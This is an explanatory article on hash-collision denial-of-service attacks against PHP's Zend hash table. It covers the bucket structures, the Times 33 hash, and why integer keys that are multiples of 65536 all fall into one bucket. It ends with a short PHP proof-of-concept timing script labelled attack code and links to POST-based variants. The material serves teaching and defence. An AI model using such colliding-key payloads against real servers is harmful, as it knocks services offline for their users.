A hash table is a very efficient data structure, and it is one of the most important data structures in PHP. It backs not only arrays and associative arrays but also object properties, function tables, and symbol tables. The Zend virtual machine also uses it internally to store contextual information (the variables and functions of an executing context are stored in hash tables).
PHP resolves collisions by chaining colliding entries in a linked list, so the average lookup complexity of a PHP hash table is O(L), where L is the average length of a bucket's list. The worst-case complexity is O(N), which occurs when all the data collide and the hash table degenerates into a single linked list.
A hash table collision attack uses carefully constructed data so that every key collides, deliberately degrading the hash table into a linked list. Each hash table operation then costs time proportional to the number of stored elements instead of roughly constant time, which consumes a large amount of CPU. The system can no longer respond to requests quickly, and the attacker achieves a denial of service (DoS).
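To make the cost difference concrete, here is a minimal sketch in C that counts key comparisons during insertion into a chained hash table. It is not Zend's implementation: the `node` type and the `count_insert_comparisons` function are hypothetical names invented for this illustration, and the table handles integer keys only.

```c
#include <assert.h>
#include <stdlib.h>

/* Hypothetical minimal chain node for integer keys; not Zend's Bucket. */
typedef struct node {
    unsigned long key;
    struct node *next;
} node;

/*
 * Inserts the n keys 0, stride, 2*stride, ... into a chained table with
 * table_size slots (a power of two) and returns the number of key
 * comparisons spent walking chains to check whether each key already exists.
 */
unsigned long count_insert_comparisons(unsigned long n,
                                       unsigned long table_size,
                                       unsigned long stride)
{
    assert(n > 0);
    assert(table_size != 0 && (table_size & (table_size - 1)) == 0);

    node **slots = calloc(table_size, sizeof *slots);
    node *pool = malloc(n * sizeof *pool);
    unsigned long comparisons = 0;
    assert(slots != NULL && pool != NULL);

    for (unsigned long i = 0; i < n; i++) {
        unsigned long key = i * stride;
        unsigned long index = key & (table_size - 1);
        int found = 0;

        /* An insert-or-update has to scan the whole chain first. */
        for (node *p = slots[index]; p != NULL; p = p->next) {
            comparisons++;
            if (p->key == key) {
                found = 1;
                break;
            }
        }
        if (!found) {
            /* Link the new node at the head of its chain. */
            pool[i].key = key;
            pool[i].next = slots[index];
            slots[index] = &pool[i];
        }
    }

    free(pool);
    free(slots);
    return comparisons;
}
```

With 1024 sequential keys in a 1024-slot table, `count_insert_comparisons(1024, 1024, 1)` finds every chain empty. With a stride equal to the table size, every key lands in slot 0 and the i-th insert walks i existing nodes, giving n(n-1)/2 comparisons in total.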
Here are the structures that make up the hash table:
typedef struct bucket {
    ulong h;                        /* Used for numeric indexing */
    uint nKeyLength;
    void *pData;
    void *pDataPtr;
    struct bucket *pListNext;
    struct bucket *pListLast;
    struct bucket *pNext;
    struct bucket *pLast;
    const char *arKey;
} Bucket;

typedef struct _hashtable {
    uint nTableSize;
    uint nTableMask;
    uint nNumOfElements;
    ulong nNextFreeElement;
    Bucket *pInternalPointer;       /* Used for element traversal */
    Bucket *pListHead;
    Bucket *pListTail;
    Bucket **arBuckets;
    dtor_func_t pDestructor;
    zend_bool persistent;
    unsigned char nApplyCount;
    zend_bool bApplyProtection;
#if ZEND_DEBUG
    int inconsistent;
#endif
} HashTable;
The hashing scheme of the Zend HashTable is exceptionally simple:
hash(key) = key & nTableMask
That is, the bucket index is just the bitwise AND of the numeric key and the HashTable's nTableMask.
If the key is a string, the Times 33 algorithm first converts the string to an integer, which is then ANDed with nTableMask:
hash(strkey) = time33(strkey) & nTableMask
Here is the Times 33 algorithm, from the file Zend/zend_hash.h:
/*
 * DJBX33A (Daniel J. Bernstein, Times 33 with Addition)
 *
 * This is Daniel J. Bernstein's popular `times 33' hash function as
 * posted by him years ago on comp.lang.c. It basically uses a function
 * like ``hash(i) = hash(i-1) * 33 + str[i]''. This is one of the best
 * known hash functions for strings. Because it is both computed very
 * fast and distributes very well.
 *
 * The magic of number 33, i.e. why it works better than many other
 * constants, prime or not, has never been adequately explained by
 * anyone. So I try an explanation: if one experimentally tests all
 * multipliers between 1 and 256 (as RSE did now) one detects that even
 * numbers are not useable at all. The remaining 128 odd numbers
 * (except for the number 1) work more or less all equally well. They
 * all distribute in an acceptable way and this way fill a hash table
 * with an average percent of approx. 86%.
 *
 * If one compares the Chi^2 values of the variants, the number 33 not
 * even has the best value. But the number 33 and a few other equally
 * good numbers like 17, 31, 63, 127 and 129 have nevertheless a great
 * advantage to the remaining numbers in the large set of possible
 * multipliers: their multiply operation can be replaced by a faster
 * operation based on just one shift plus either a single addition
 * or subtraction operation. And because a hash function has to both
 * distribute good _and_ has to be very fast to compute, those few
 * numbers should be preferred and seems to be the reason why Daniel J.
 * Bernstein also preferred it.
 *
 *
 *                  -- Ralf S. Engelschall
 */
static inline ulong zend_inline_hash_func(const char *arKey, uint nKeyLength)
{
    register ulong hash = 5381;

    /* variant with the hash unrolled eight times */
    for (; nKeyLength >= 8; nKeyLength -= 8) {
        hash = ((hash << 5) + hash) + *arKey++;
        hash = ((hash << 5) + hash) + *arKey++;
        hash = ((hash << 5) + hash) + *arKey++;
        hash = ((hash << 5) + hash) + *arKey++;
        hash = ((hash << 5) + hash) + *arKey++;
        hash = ((hash << 5) + hash) + *arKey++;
        hash = ((hash << 5) + hash) + *arKey++;
        hash = ((hash << 5) + hash) + *arKey++;
    }
    switch (nKeyLength) {
        case 7: hash = ((hash << 5) + hash) + *arKey++; /* fallthrough... */
        case 6: hash = ((hash << 5) + hash) + *arKey++; /* fallthrough... */
        case 5: hash = ((hash << 5) + hash) + *arKey++; /* fallthrough... */
        case 4: hash = ((hash << 5) + hash) + *arKey++; /* fallthrough... */
        case 3: hash = ((hash << 5) + hash) + *arKey++; /* fallthrough... */
        case 2: hash = ((hash << 5) + hash) + *arKey++; /* fallthrough... */
        case 1: hash = ((hash << 5) + hash) + *arKey++; break;
        case 0: break;
EMPTY_SWITCH_DEFAULT_CASE()
    }
    return hash;
}
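The unrolling makes the Zend function look more complicated than it is. As a rough sketch, the same computation can be written as a plain loop. The names `times33` and `slot_for_string` are hypothetical and chosen only for this example, and the code assumes keys made of plain ASCII bytes.

```c
#include <assert.h>
#include <stddef.h>

/* Plain-loop DJBX33A: start at 5381, then hash = hash * 33 + byte. */
unsigned long times33(const char *key, size_t len)
{
    unsigned long hash = 5381;

    assert(key != NULL);
    for (size_t i = 0; i < len; i++) {
        /* (hash << 5) + hash is hash * 32 + hash, i.e. hash * 33. */
        hash = ((hash << 5) + hash) + (unsigned long)key[i];
    }
    return hash;
}

/* Bucket index of a string key in a table whose mask is table_mask. */
unsigned long slot_for_string(const char *key, size_t len,
                              unsigned long table_mask)
{
    return times33(key, len) & table_mask;
}
```

For example, `times33("a", 1)` is 5381 * 33 + 97 = 177670, and in a 16-slot table (mask 15) that key lands in slot 6.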
So, how are colliding keys constructed?
The size of a PHP hash table is always a power of 2. For example, an array holding 10 elements has an actual table size of 16, one holding 20 elements has a size of 32, and one holding 63 elements has a size of 64. When the number of elements exceeds the current table size, PHP grows the table and rehashes the existing elements into it.
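The sizing rule can be sketched as a small C helper. This is an illustration rather than PHP's code: `table_size_for` and `table_mask_for` are hypothetical names, and the minimum size of 8 slots is an assumption based on how PHP 5 initializes its tables.

```c
#include <assert.h>

/* Assumption: the smallest table has 8 slots, as in PHP 5. */
#define MIN_TABLE_SIZE 8u

/* Smallest power-of-two table size that can hold num_elements entries. */
unsigned int table_size_for(unsigned int num_elements)
{
    unsigned int size = MIN_TABLE_SIZE;

    assert(num_elements <= 0x80000000u); /* keeps the shift from overflowing */
    while (size < num_elements) {
        size <<= 1; /* grow by doubling */
    }
    return size;
}

/* The mask is the table size minus one, i.e. all low bits set. */
unsigned int table_mask_for(unsigned int num_elements)
{
    return table_size_for(num_elements) - 1u;
}
```

This reproduces the figures above: 10 elements give a size of 16, 20 give 32, and 63 give 64. For 65536 elements the mask is 0xFFFF, which is the sixteen 1 bits used in the attack below.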
Now suppose we are going to insert 65,536 elements (the table may be resized along the way, but all we need to know is that the final table size is 65536, so the corresponding nTableMask is 0 1111 1111 1111 1111). If the key of the first element is 0, its hash is 0. If the key of the second element is 65536, its hash is also 0, and the same holds for the third key, 131072, and for every later key of the form (n - 1) × 65536. This makes the underlying PHP array hash every element into bucket 0, so the hash table degenerates into a linked list.
The specific values look like this:
0000 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0
0001 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0
0010 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0
0011 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0
0100 0000 0000 0000 0000 & 0 1111 1111 1111 1111 = 0
......
In general, as long as the low 16 bits of a key are all 0, the value left after masking is 0, so all such keys collide in bucket 0.
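The rule can be checked with a few lines of C. This is only a sketch of the arithmetic, with hypothetical helper names (`colliding_key`, `slot_for_key`, `all_collide_in_slot_zero`). It works for any power-of-two table size, not just 65536.

```c
#include <assert.h>

/* i-th colliding integer key for a table of table_size slots. */
unsigned long colliding_key(unsigned long i, unsigned long table_size)
{
    /* table_size must be a power of two for the mask trick to hold. */
    assert(table_size != 0 && (table_size & (table_size - 1)) == 0);
    return i * table_size;
}

/* Bucket index of an integer key: key & nTableMask. */
unsigned long slot_for_key(unsigned long key, unsigned long table_size)
{
    return key & (table_size - 1);
}

/* Returns 1 if the first n generated keys all fall into slot 0. */
int all_collide_in_slot_zero(unsigned long n, unsigned long table_size)
{
    for (unsigned long i = 0; i < n; i++) {
        if (slot_for_key(colliding_key(i, table_size), table_size) != 0) {
            return 0;
        }
    }
    return 1;
}
```

With a table size of 65536, the generated keys are 0, 65536, 131072, and so on, and each of them masks to 0. A key such as 64 masks to 64, so it does not collide with them.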
Here is an attack code written using this principle:
<?php
// Attack case: every key is a multiple of 65536, so all keys fall into bucket 0.
$size = pow(2, 16);

$startTime = microtime(true);
$array = array();
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
    $array[$key] = 0;
}
$endTime = microtime(true);
echo $endTime - $startTime, ' seconds', "\n";

/**********************************************************************/

// Normal case: the same number of elements, inserted with sequential keys.
$size = pow(2, 16);

$startTime = microtime(true);
$array = array();
for ($key = 0, $maxKey = $size - 1; $key <= $maxKey; $key += 1) {
    $array[$key] = 0;
}
$endTime = microtime(true);
echo $endTime - $startTime, ' seconds', "\n";
The normal loop finishes quickly, while the attack loop takes dozens of seconds.
For hash collision attacks delivered through POST requests, see http://www.laruence.com/2011/12/30/2440.html.
Reference: http://www.laruence.com/2011/12/30/2435.html
PHP Hash Table Collision Attack